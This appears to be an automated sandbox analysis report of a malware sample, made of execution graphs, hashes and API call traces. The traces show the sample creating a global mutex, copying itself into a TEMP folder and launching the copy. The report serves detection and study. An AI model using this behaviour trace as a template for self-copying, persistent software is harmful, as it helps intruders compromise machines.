                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Sleep___std_exception_destroy
                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                            • API String ID: 2427919145-410509341
                                                                                                                                                                                            • Opcode ID: ce12c876a9f9adfea07bbc0670c194daa27135df30e9fcf7b48569acc498f2e5
• Instruction ID: da4415d02617d6e6183bb3f001bbb416f2d0701d32fd06824490e46a1874263c
• Opcode Fuzzy Hash: ce12c876a9f9adfea07bbc0670c194daa27135df30e9fcf7b48569acc498f2e5
• Instruction Fuzzy Hash: BBF0E0B070022057D70CAB75DC59A3E3AA56BC4700F80005CF54557382EA615E448BB6
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,005FDD21,-00000020,00000FA0,00000000,00000000,00000000,00000000,005D1C72), ref: 005FD4F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: @0]$InitializeCriticalSectionEx
• API String ID: 2593887523-2466669
• Opcode ID: 1dd81996eae76e4076587eea73a921f6b120254e85f04590d150956deb425331
• Instruction ID: 114d4a131491be4fdc96d0d435a166e2259b79817d0ae15d00f5ab8c7f475f7e
• Opcode Fuzzy Hash: 1dd81996eae76e4076587eea73a921f6b120254e85f04590d150956deb425331
• Instruction Fuzzy Hash: 4FE0923118022DB7DF112F40DC09DEEBF27FB40B60B05C420FE1916261DBB78960A6E0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: Alloc
• String ID: @0]$FlsAlloc
• API String ID: 2773662609-3171498700
• Opcode ID: 5781ef21b652887bcaea81a75cc37deedc6b1bcd43f041e2eccd5441cf857e33
• Instruction ID: 3309b9de5fcb8c87596aa947a24a0eefcae592119609525cce647c2513261b63
• Opcode Fuzzy Hash: 5781ef21b652887bcaea81a75cc37deedc6b1bcd43f041e2eccd5441cf857e33
• Instruction Fuzzy Hash: D0E0CD315C463873D35123915C09EAB7D1BE754F61B090C20FB051128185A6494181E1

Execution Graph

Execution Coverage: 3.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 870
Total number of Limit Nodes: 11
                                                                                                                                                                                            execution_graph 24536 556254 64 API calls 2 library calls 24437 56c054 47 API calls 24438 567854 42 API calls 3 library calls 24487 550d57 26 API calls 24537 557e51 25 API calls 2 library calls 24489 533d40 66 API calls 24492 55a141 GetCommandLineA GetCommandLineW 24442 53104d 46 API calls 24494 54f94b 9 API calls 3 library calls 24443 56ac72 71 API calls 3 library calls 24586 54ff72 44 API calls 4 library calls 24445 55d47c 26 API calls 2 library calls 24446 55bc7f 7 API calls ___scrt_uninitialize_crt 24588 54db20 157 API calls 3 library calls 24590 543b60 68 API calls 2 library calls 24592 553760 6 API calls 4 library calls 24390 550d69 24391 550d75 ___scrt_is_nonwritable_in_current_image 24390->24391 24415 550f6b 24391->24415 24393 550d7c 24394 550ed5 24393->24394 24403 550da6 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 24393->24403 24431 551434 4 API calls 2 library calls 24394->24431 24396 550edc 24397 5566fe 23 API calls 24396->24397 24398 550ee2 24397->24398 24432 5566c2 23 API calls std::locale::_Setgloballocale 24398->24432 24400 550eea 24401 550dc5 24402 550e46 24423 559f7c 24402->24423 24403->24401 24403->24402 24427 5566d8 37 API calls 4 library calls 24403->24427 24406 550e4c 24407 550e63 24406->24407 24428 551554 GetModuleHandleW 24407->24428 24409 550e6d 24409->24396 24410 550e71 24409->24410 24411 550e7a 24410->24411 24429 5566b3 23 API calls std::locale::_Setgloballocale 24410->24429 24430 5510dc 73 API calls ___scrt_uninitialize_crt 24411->24430 24414 550e83 24414->24401 24416 550f74 24415->24416 24433 550ad3 IsProcessorFeaturePresent 24416->24433 24418 550f80 24434 5538be 10 API calls 2 library calls 24418->24434 24420 550f85 24421 550f89 24420->24421 24435 5538dd 7 API calls 2 library calls 24420->24435 
24421->24393 24424 559f85 24423->24424 24425 559f8a 24423->24425 24436 559ce0 49 API calls 24424->24436 24425->24406 24427->24402 24428->24409 24429->24411 24430->24414 24431->24396 24432->24400 24433->24418 24434->24420 24435->24421 24436->24425 24498 55d969 30 API calls 2 library calls 24594 541310 29 API calls 24448 53101b 28 API calls 24449 55f019 64 API calls 2 library calls 24450 568004 GetProcessHeap 24598 531300 14 API calls 2 library calls 24600 532700 68 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24551 543a00 67 API calls 24451 531005 29 API calls 24503 562d00 15 API calls 24552 56c600 21 API calls 24601 54f70c 16 API calls 2 library calls 24452 533030 EnterCriticalSection __fread_nolock 24506 54f537 DeleteCriticalSection 24604 535330 27 API calls CallUnexpected 24553 550232 DecodePointer 24554 55ea32 32 API calls 4 library calls 24555 552238 50 API calls 2 library calls 24556 55263b 8 API calls 23393 562727 23398 5624fd 23393->23398 23396 562766 23399 56251c 23398->23399 23400 56252f 23399->23400 23408 562544 23399->23408 23418 558b26 14 API calls __dosmaperr 23400->23418 23402 562534 23419 554e3f 25 API calls __Getctype 23402->23419 23404 56253f 23404->23396 23415 56ad8f 23404->23415 23406 562715 23424 554e3f 25 API calls __Getctype 23406->23424 23413 562664 23408->23413 23420 56874a 37 API calls 3 library calls 23408->23420 23410 5626b4 23410->23413 23421 56874a 37 API calls 3 library calls 23410->23421 23412 5626d2 23412->23413 23422 56874a 37 API calls 3 library calls 23412->23422 23413->23404 23423 558b26 14 API calls __dosmaperr 23413->23423 23425 56a754 23415->23425 23418->23402 23419->23404 23420->23410 23421->23412 23422->23413 23423->23406 23424->23404 23426 56a760 ___scrt_is_nonwritable_in_current_image 23425->23426 23427 56a767 23426->23427 23430 56a792 23426->23430 23445 558b26 14 API calls __dosmaperr 23427->23445 23429 56a76c 23446 554e3f 25 API calls __Getctype 23429->23446 23436 56ad21 23430->23436 23435 56a776 23435->23396 23448 
5642f4 23436->23448 23441 56ad57 23443 56a7b6 23441->23443 23502 55ce37 14 API calls __dosmaperr 23441->23502 23447 56a7e9 LeaveCriticalSection __wsopen_s 23443->23447 23445->23429 23446->23435 23447->23435 23503 556ccd 23448->23503 23452 564318 23453 5593c7 23452->23453 23515 559315 23453->23515 23456 56adaf 23457 56adcc 23456->23457 23458 56ade1 23457->23458 23459 56adfa 23457->23459 23554 558b13 14 API calls __dosmaperr 23458->23554 23540 565ab0 23459->23540 23463 56ae1f 23553 56aa68 CreateFileW 23463->23553 23464 56ae08 23556 558b13 14 API calls __dosmaperr 23464->23556 23468 56ae0d 23557 558b26 14 API calls __dosmaperr 23468->23557 23469 56ae58 23470 56aed5 GetFileType 23469->23470 23472 56aeaa GetLastError 23469->23472 23558 56aa68 CreateFileW 23469->23558 23473 56af27 23470->23473 23474 56aee0 GetLastError 23470->23474 23559 558af0 14 API calls __dosmaperr 23472->23559 23562 5659fb 15 API calls 2 library calls 23473->23562 23560 558af0 14 API calls __dosmaperr 23474->23560 23475 56ade6 23555 558b26 14 API calls __dosmaperr 23475->23555 23479 56aeee CloseHandle 23479->23475 23482 56af17 23479->23482 23481 56ae9d 23481->23470 23481->23472 23561 558b26 14 API calls __dosmaperr 23482->23561 23483 56af48 23485 56af94 23483->23485 23563 56ac77 71 API calls 3 library calls 23483->23563 23491 56af9b 23485->23491 23565 56a815 71 API calls 4 library calls 23485->23565 23486 56af1c 23486->23475 23489 56afc9 23490 56afd7 23489->23490 23489->23491 23492 56adf3 23490->23492 23494 56b053 CloseHandle 23490->23494 23564 55db0e 28 API calls 2 library calls 23491->23564 23492->23441 23566 56aa68 CreateFileW 23494->23566 23496 56b07e 23497 56b088 GetLastError 23496->23497 23501 56afa2 23496->23501 23567 558af0 14 API calls __dosmaperr 23497->23567 23499 56b094 23568 565bc3 15 API calls 2 library calls 23499->23568 23501->23492 23502->23443 23504 556ced 23503->23504 23510 556ce4 23503->23510 23504->23510 23512 55ca90 37 API calls 3 library calls 23504->23512 23506 556d0d 23513 
560cac 37 API calls __Getctype 23506->23513 23508 556d23 23514 560cd9 37 API calls __fassign 23508->23514 23510->23452 23511 55d26e 5 API calls std::_Lockit::_Lockit 23510->23511 23511->23452 23512->23506 23513->23508 23514->23510 23516 559323 23515->23516 23517 55933d 23515->23517 23533 5593e4 14 API calls _free 23516->23533 23519 559344 23517->23519 23520 559363 23517->23520 23524 55932d 23519->23524 23534 559425 15 API calls __wsopen_s 23519->23534 23535 56400f MultiByteToWideChar 23520->23535 23523 559372 23525 559379 GetLastError 23523->23525 23526 55939f 23523->23526 23538 559425 15 API calls __wsopen_s 23523->23538 23524->23441 23524->23456 23536 558af0 14 API calls __dosmaperr 23525->23536 23526->23524 23539 56400f MultiByteToWideChar 23526->23539 23530 559385 23537 558b26 14 API calls __dosmaperr 23530->23537 23531 5593b6 23531->23524 23531->23525 23533->23524 23534->23524 23535->23523 23536->23530 23537->23524 23538->23526 23539->23531 23541 565abc ___scrt_is_nonwritable_in_current_image 23540->23541 23569 55800d EnterCriticalSection 23541->23569 23543 565ae8 23573 56588a 15 API calls 2 library calls 23543->23573 23547 565ac3 23547->23543 23549 565b57 EnterCriticalSection 23547->23549 23551 565b0a 23547->23551 23548 565aed 23548->23551 23574 5659d8 EnterCriticalSection 23548->23574 23550 565b64 LeaveCriticalSection 23549->23550 23549->23551 23550->23547 23570 565bba 23551->23570 23553->23469 23554->23475 23555->23492 23556->23468 23557->23475 23558->23481 23559->23475 23560->23479 23561->23486 23562->23483 23563->23485 23564->23501 23565->23489 23566->23496 23567->23499 23568->23501 23569->23547 23575 558055 LeaveCriticalSection 23570->23575 23572 565b2a 23572->23463 23572->23464 23573->23548 23574->23551 23575->23572 24508 533120 LeaveCriticalSection __Getctype 24558 533620 47 API calls 24509 565522 45 API calls 5 library calls 24457 53102e 72 API calls 24609 5673d4 38 API calls std::_Locinfo::_Locinfo_ctor 24512 5339d0 27 API calls 24611 5337d0 43 API 
calls std::_Throw_Cpp_error 24612 551fd6 37 API calls 2 library calls 24513 565dd2 41 API calls 3 library calls 24562 55a2d1 11 API calls __Getctype 24458 54f0d3 69 API calls ___std_exception_destroy 24515 5599dc 51 API calls 3 library calls 24563 55d6de FreeLibrary 23576 53c2c0 23577 53c2d3 23576->23577 23594 544d30 23577->23594 23584 53c3fe 23624 532eb0 25 API calls 23584->23624 23586 53c408 23625 531a50 63 API calls 3 library calls 23586->23625 23587 53c450 23592 53c421 23587->23592 23626 532310 43 API calls 3 library calls 23587->23626 23590 53c4ae 23627 551930 RaiseException 23590->23627 23593 53c4bc 23628 550a3c 23594->23628 23597 544d9e 23637 531b80 23597->23637 23600 544dcf 23601 544e13 23600->23601 23604 544e2a 23600->23604 23602 53c341 23601->23602 23661 54fbdc 9 API calls 2 library calls 23601->23661 23609 53c640 23602->23609 23662 532310 43 API calls 3 library calls 23604->23662 23606 544e5e 23663 551930 RaiseException 23606->23663 23608 544e6c 23610 550a3c std::_Facet_Register 16 API calls 23609->23610 23611 53c65b 23610->23611 23613 53c360 23611->23613 23686 54f760 43 API calls 5 library calls 23611->23686 23614 54fdc2 23613->23614 23617 54fd1c 23614->23617 23615 53c3f6 23615->23584 23615->23587 23616 54fd7d 23622 54fd84 23616->23622 23687 54fdcb 23616->23687 23617->23615 23617->23616 23619 54fdcb 28 API calls 23617->23619 23619->23616 23622->23615 23690 5551bb 67 API calls 4 library calls 23622->23690 23624->23586 23625->23592 23626->23590 23627->23593 23630 550a41 23628->23630 23631 544d8e 23630->23631 23634 531790 Concurrency::cancel_current_task 23630->23634 23664 558083 23630->23664 23674 559778 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23630->23674 23631->23597 23660 54f760 43 API calls 5 library calls 23631->23660 23633 550a67 23633->23633 23634->23633 23673 551930 RaiseException 23634->23673 23636 5317ac 23677 54f506 7 API calls std::_Lockit::_Lockit 23637->23677 23639 531b97 23641 531bd2 23639->23641 23678 54f506 7 API 
calls std::_Lockit::_Lockit 23639->23678 23646 531c19 23641->23646 23647 531c2c 23641->23647 23657 531c98 23641->23657 23643 531bb2 23679 54f55e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23643->23679 23645 531cb0 23645->23600 23680 54f55e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23646->23680 23648 550a3c std::_Facet_Register 16 API calls 23647->23648 23652 531c33 23648->23652 23650 531c23 23650->23600 23651 531c72 23653 531c92 23651->23653 23683 5325f0 59 API calls 2 library calls 23651->23683 23652->23651 23681 532070 62 API calls 2 library calls 23652->23681 23684 54f72e 16 API calls std::_Facet_Register 23653->23684 23685 54f55e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 23657->23685 23658 531c60 23682 54f975 41 API calls __Getctype 23658->23682 23660->23597 23661->23602 23662->23606 23663->23608 23666 56097d 23664->23666 23665 5609bb 23676 558b26 14 API calls __dosmaperr 23665->23676 23666->23665 23667 5609a6 HeapAlloc 23666->23667 23671 56098f __Getctype 23666->23671 23669 5609b9 23667->23669 23667->23671 23670 5609c0 23669->23670 23670->23630 23671->23665 23671->23667 23675 559778 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 23671->23675 23673->23636 23674->23630 23675->23671 23676->23670 23677->23639 23678->23643 23679->23641 23680->23650 23681->23658 23682->23651 23684->23657 23685->23645 23686->23613 23692 558a5e 23687->23692 23690->23615 23691 555e8c 64 API calls 23691->23622 23693 5589a7 ___scrt_is_nonwritable_in_current_image 23692->23693 23694 5589ba 23693->23694 23696 5589da 23693->23696 23717 558b26 14 API calls __dosmaperr 23694->23717 23698 5589ec 23696->23698 23699 5589df 23696->23699 23697 5589bf 23718 554e3f 25 API calls __Getctype 23697->23718 23709 55dbd1 23698->23709 23719 558b26 14 API calls __dosmaperr 23699->23719 23704 5589fc 23720 558b26 14 API calls __dosmaperr 23704->23720 23705 558a09 __Getctype 23721 558a47 LeaveCriticalSection __Getctype 
23705->23721 23708 54fd9d 23708->23615 23708->23691 23710 55dbdd ___scrt_is_nonwritable_in_current_image 23709->23710 23722 55800d EnterCriticalSection 23710->23722 23712 55dbeb 23723 55dc75 23712->23723 23717->23697 23718->23708 23719->23708 23720->23708 23721->23708 23722->23712 23731 55dc98 23723->23731 23724 55dbf8 23737 55dc31 23724->23737 23725 55dcf0 23742 55ce71 14 API calls 3 library calls 23725->23742 23727 55dcf9 23743 55ce37 14 API calls __dosmaperr 23727->23743 23730 55dd02 23730->23724 23744 55d4b8 6 API calls std::_Lockit::_Lockit 23730->23744 23731->23724 23731->23725 23731->23731 23740 55511c EnterCriticalSection 23731->23740 23741 555130 LeaveCriticalSection 23731->23741 23733 55dd21 23745 55511c EnterCriticalSection 23733->23745 23736 55dd34 23736->23724 23746 558055 LeaveCriticalSection 23737->23746 23739 5589f5 23739->23704 23739->23705 23740->23731 23741->23731 23742->23727 23743->23730 23744->23733 23745->23736 23746->23739 24462 53c4c0 71 API calls 6 library calls 24516 5311c0 26 API calls ___std_exception_copy 24463 533cc7 25 API calls 24518 5441c0 49 API calls 5 library calls 24464 5548c0 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 24519 566dc1 19 API calls __Getctype 24520 566dcc 8 API calls 24521 55d9c9 15 API calls 24467 5648ff 19 API calls 2 library calls 24566 550eeb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24470 5584ea 45 API calls 5 library calls 24471 562ce9 IsProcessorFeaturePresent 24472 564496 18 API calls 3 library calls 24473 533890 65 API calls 24525 534190 55 API calls 3 library calls 24570 567291 40 API calls std::_Locinfo::_Locinfo_ctor 24475 55e89d 39 API calls 3 library calls 24476 55cc9c 16 API calls __dosmaperr 24617 567387 11 API calls 3 library calls 24530 533d80 29 API calls 3 library calls 24618 533780 63 API calls 24619 54ff81 26 API calls 2 library calls 24620 550782 41 API calls 24479 55508a 71 API calls 2 library 
calls 24480 53108c std::_Init_wcout::_Init_wcout 24483 5590b1 20 API calls 24622 554fb2 15 API calls 2 library calls 24484 550ca4 45 API calls __RTC_Initialize 24579 567aa7 40 API calls 3 library calls 24580 550ea4 23 API calls std::locale::_Setgloballocale 24535 5515a3 47 API calls _unexpected 23747 5498ae 23750 5498cf 23747->23750 24060 534740 23750->24060 23751 534740 std::_Throw_Cpp_error 43 API calls 23752 549c4c 23751->23752 24064 539de0 23752->24064 23754 549c65 23755 534740 std::_Throw_Cpp_error 43 API calls 23754->23755 23756 549cc3 23755->23756 24075 531290 23756->24075 23758 549cda 23759 531290 std::_Throw_Cpp_error 25 API calls 23758->23759 23760 549ce5 23759->23760 23761 531290 std::_Throw_Cpp_error 25 API calls 23760->23761 23762 549cf0 23761->23762 23763 531290 std::_Throw_Cpp_error 25 API calls 23762->23763 23765 549cfb 23763->23765 23764 534740 std::_Throw_Cpp_error 43 API calls 23767 549ecc 23764->23767 23765->23764 23765->23765 23766 534740 std::_Throw_Cpp_error 43 API calls 23768 54a0ac 23766->23768 23767->23766 23767->23767 23769 539de0 47 API calls 23768->23769 23770 54a0c5 23769->23770 23771 534740 std::_Throw_Cpp_error 43 API calls 23770->23771 23772 54a123 23771->23772 23773 531290 std::_Throw_Cpp_error 25 API calls 23772->23773 23774 54a13a 23773->23774 23775 531290 std::_Throw_Cpp_error 25 API calls 23774->23775 23776 54a145 23775->23776 23777 531290 std::_Throw_Cpp_error 25 API calls 23776->23777 23778 54a150 23777->23778 23779 531290 std::_Throw_Cpp_error 25 API calls 23778->23779 23781 54a15b 23779->23781 23780 534740 std::_Throw_Cpp_error 43 API calls 23783 54a32c 23780->23783 23781->23780 23781->23781 23782 534740 std::_Throw_Cpp_error 43 API calls 23784 54a50c 23782->23784 23783->23782 23783->23783 23785 539de0 47 API calls 23784->23785 23786 54a525 23785->23786 23787 534740 std::_Throw_Cpp_error 43 API calls 23786->23787 23788 54a589 23787->23788 23789 531290 std::_Throw_Cpp_error 25 API calls 23788->23789 23790 54a5a0 23789->23790 
23791 531290 std::_Throw_Cpp_error 25 API calls 23790->23791 23792 54a5ab 23791->23792 23793 531290 std::_Throw_Cpp_error 25 API calls 23792->23793 23794 54a5b6 23793->23794 23795 531290 std::_Throw_Cpp_error 25 API calls 23794->23795 23796 54a5c1 23795->23796 23797 534740 std::_Throw_Cpp_error 43 API calls 23796->23797 23799 54a79c 23797->23799 23798 534740 std::_Throw_Cpp_error 43 API calls 23800 54a97c 23798->23800 23799->23798 23799->23799 23801 539de0 47 API calls 23800->23801 23802 54a995 23801->23802 23803 534740 std::_Throw_Cpp_error 43 API calls 23802->23803 23804 54aa92 23803->23804 23805 531290 std::_Throw_Cpp_error 25 API calls 23804->23805 23806 54aaa9 23805->23806 23807 531290 std::_Throw_Cpp_error 25 API calls 23806->23807 23808 54aab4 23807->23808 23809 531290 std::_Throw_Cpp_error 25 API calls 23808->23809 23810 54aabf 23809->23810 23811 531290 std::_Throw_Cpp_error 25 API calls 23810->23811 23812 54aaca 23811->23812 23812->23812 23813 534740 std::_Throw_Cpp_error 43 API calls 23812->23813 23816 54ac9c 23813->23816 23814 534740 std::_Throw_Cpp_error 43 API calls 23815 54ae7c 23814->23815 23817 539de0 47 API calls 23815->23817 23816->23814 23816->23816 23818 54ae95 23817->23818 23819 534740 std::_Throw_Cpp_error 43 API calls 23818->23819 23820 54aef3 23819->23820 23821 531290 std::_Throw_Cpp_error 25 API calls 23820->23821 23822 54af0a 23821->23822 23823 531290 std::_Throw_Cpp_error 25 API calls 23822->23823 23824 54af15 23823->23824 23825 531290 std::_Throw_Cpp_error 25 API calls 23824->23825 23826 54af20 23825->23826 23827 531290 std::_Throw_Cpp_error 25 API calls 23826->23827 23828 54af2b 23827->23828 23828->23828 23829 534740 std::_Throw_Cpp_error 43 API calls 23828->23829 23830 54b0fc 23829->23830 23831 534740 std::_Throw_Cpp_error 43 API calls 23830->23831 23832 54b2dc 23831->23832 23833 539de0 47 API calls 23832->23833 23835 54b2f7 23833->23835 23834 534740 std::_Throw_Cpp_error 43 API calls 23836 54b4a3 23834->23836 23835->23834 23835->23835 
23837 531290 std::_Throw_Cpp_error 25 API calls 23836->23837 23838 54b4bb 23837->23838 23839 531290 std::_Throw_Cpp_error 25 API calls 23838->23839 23840 54b4c6 23839->23840 23841 531290 std::_Throw_Cpp_error 25 API calls 23840->23841 23842 54b4d1 23841->23842 23843 531290 std::_Throw_Cpp_error 25 API calls 23842->23843 23845 54b4dc 23843->23845 23844 534740 std::_Throw_Cpp_error 43 API calls 23846 54b6ad 23844->23846 23845->23844 23845->23845 23847 534740 std::_Throw_Cpp_error 43 API calls 23846->23847 23848 54b88c 23847->23848 23849 539de0 47 API calls 23848->23849 23852 54b8a7 23849->23852 23850 534740 std::_Throw_Cpp_error 43 API calls 23851 54ba56 23850->23851 23853 531290 std::_Throw_Cpp_error 25 API calls 23851->23853 23852->23850 23852->23852 23854 54ba6e 23853->23854 23855 531290 std::_Throw_Cpp_error 25 API calls 23854->23855 23856 54ba79 23855->23856 23857 531290 std::_Throw_Cpp_error 25 API calls 23856->23857 23858 54ba84 23857->23858 23859 531290 std::_Throw_Cpp_error 25 API calls 23858->23859 23860 54ba8f 23859->23860 23860->23860 23861 534740 std::_Throw_Cpp_error 43 API calls 23860->23861 23862 54bc70 23861->23862 23863 534740 std::_Throw_Cpp_error 43 API calls 23862->23863 23864 54be50 23863->23864 23865 539de0 47 API calls 23864->23865 23867 54be6b 23865->23867 23866 534740 std::_Throw_Cpp_error 43 API calls 23868 54c023 23866->23868 23867->23866 23867->23867 23869 531290 std::_Throw_Cpp_error 25 API calls 23868->23869 23870 54c03b 23869->23870 23871 531290 std::_Throw_Cpp_error 25 API calls 23870->23871 23872 54c046 23871->23872 23873 531290 std::_Throw_Cpp_error 25 API calls 23872->23873 23874 54c051 23873->23874 23875 531290 std::_Throw_Cpp_error 25 API calls 23874->23875 23877 54c05c 23875->23877 23876 54c643 GetModuleHandleA 23876->23877 23877->23876 23878 54c663 GetVersion 23877->23878 23879 54c6c1 23878->23879 23879->23879 23880 534740 std::_Throw_Cpp_error 43 API calls 23879->23880 23881 54c84d 23880->23881 23882 534740 
APIs
• CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,Global\,00000007,?,?), ref: 005367F1
• GetLastError.KERNEL32 ref: 00536871
• GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 00536893
• CreateDirectoryA.KERNEL32(?,00000000,0000000F,?,00000000,0056E898,00000001,?,?,?,?), ref: 00536B82
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00536B96
• CopyFileA.KERNEL32(?,00000000,00000000), ref: 00536E2E
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00000000,?), ref: 0053790D
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0053791C
• CloseHandle.KERNEL32(00000000), ref: 0053792B
• CloseHandle.KERNEL32(?), ref: 00537930
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00538C04
• GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104,00000001,00000006), ref: 00538C7F
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Create$CloseEnvironmentFileHandleVariable$CopyDirectoryErrorExecuteLastModuleMutexNameObjectProcessShellSingleWait
• String ID: " /F$Global\$TEMP$XFZ@$XFZ@7$XFZ@i6$XFZ@i6$XFZ@i6$XFZ@i6$`V$open$wuC$wuC$wuC
• API String ID: 747220738-2991300673
• Opcode ID: 01b78a726bde9690f608c25c0e09999b7137a423ea066f02e269b970c2a618a8
• Instruction ID: 43bee921a1f47131904678d18cc2b56cd3f4953dbfa6a90a36fbe94d3fc1478c
• Opcode Fuzzy Hash: 01b78a726bde9690f608c25c0e09999b7137a423ea066f02e269b970c2a618a8
• Instruction Fuzzy Hash: 5B63E576D216498AEB07CB38C8467E9FB75BFA6344F14C35AE40477662FB7066C68B00
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: !yW$7<=<I$@FSYM_;$XSZ]A_;$ctx`9$dszm9$fyyq9$wytpj:$z}7
• API String ID: 3677997916-2810526515
• Opcode ID: e723b7fbb3010b81ed6ef3f8c85c85b929c4e5d7eec414f285c6d59d396f9e50
• Instruction ID: f182f7c80bbb7301c2bc39effc4554991daeb3bb3e1b08d4b5918b32de800a89
• Opcode Fuzzy Hash: e723b7fbb3010b81ed6ef3f8c85c85b929c4e5d7eec414f285c6d59d396f9e50
• Instruction Fuzzy Hash: 59B3F639C256494BEB07DB38D8166D9F778BF66384F50C3AAE405B3562FB3066C68B04

APIs
• GetCurrentProcess.KERNEL32(?,?,005565FF,00000001,00000000,?,00000001,?,0055CD85), ref: 00556622
• TerminateProcess.KERNEL32(00000000,?,005565FF,00000001,00000000,?,00000001,?,0055CD85), ref: 00556629
• ExitProcess.KERNEL32 ref: 0055663B
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 2585d474159650da9a509e8d9dc11d5746b106b8f4bf573c853a7d0a3bd71a4b
• Instruction ID: 11afba4255da526af7053fcae6d196394685cc337a88ab9e874d4eef8ddcc37f
• Opcode Fuzzy Hash: 2585d474159650da9a509e8d9dc11d5746b106b8f4bf573c853a7d0a3bd71a4b
• Instruction Fuzzy Hash: 6CE04631001148ABCF112B58DC6E9093F29FB52342F404011F8058B231CB75DC8AEB50

APIs
• Part of subcall function 0056AA68: CreateFileW.KERNELBASE(00000000,00000000,?,0056AE58,?,?,00000000,?,0056AE58,00000000,0000000C), ref: 0056AA85
• GetLastError.KERNEL32 ref: 0056AEC3
• __dosmaperr.LIBCMT ref: 0056AECA
• GetFileType.KERNEL32(00000000), ref: 0056AED6
• GetLastError.KERNEL32 ref: 0056AEE0
• __dosmaperr.LIBCMT ref: 0056AEE9
• CloseHandle.KERNEL32(00000000), ref: 0056AF09
• CloseHandle.KERNEL32(?), ref: 0056B056
• GetLastError.KERNEL32 ref: 0056B088
• __dosmaperr.LIBCMT ref: 0056B08F
Memory Dump Source
